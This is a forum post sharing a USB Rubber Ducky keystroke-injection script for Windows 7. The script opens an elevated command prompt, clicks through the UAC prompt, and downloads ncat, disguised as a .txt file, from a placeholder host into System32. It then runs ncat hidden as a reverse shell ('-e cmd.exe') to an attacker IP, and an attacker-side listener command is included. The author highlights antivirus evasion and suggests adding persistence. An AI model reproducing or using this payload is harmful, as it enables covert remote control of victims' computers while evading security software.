Jump to content

[Source] Undetected windows backboor shell w/ Uac (Win7)


Grimsoul
 Share

Recommended Posts

Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!)

So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging.
After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs.
So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all.

For this attack , we download a copy of ncat on the victims machine and run it silently.

You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here.

ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background.

The rest is explained in the comments.

You can compare the AV results between netcat and ncat here:

VirusTotal ncat results (Picked up by norton though , sucks i know)

VirusTotal netcat results

Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window.

- GrimsouL

REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 

REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target.
DELAY 1000
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed.
DELAY 1000
STRING a
DELAY 200
REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it
ENTER
REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 700
REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe')
ENTER
REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB)
DELAY 10000
ENTER
REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background  , we use a powershell argument to make it so.
STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe'
ENTER
REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway
STRING exit
ENTER

To run our listener on the attacker machine

ncat -l <ATTACKER IP> -p <ATTACKER PORT> -v

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...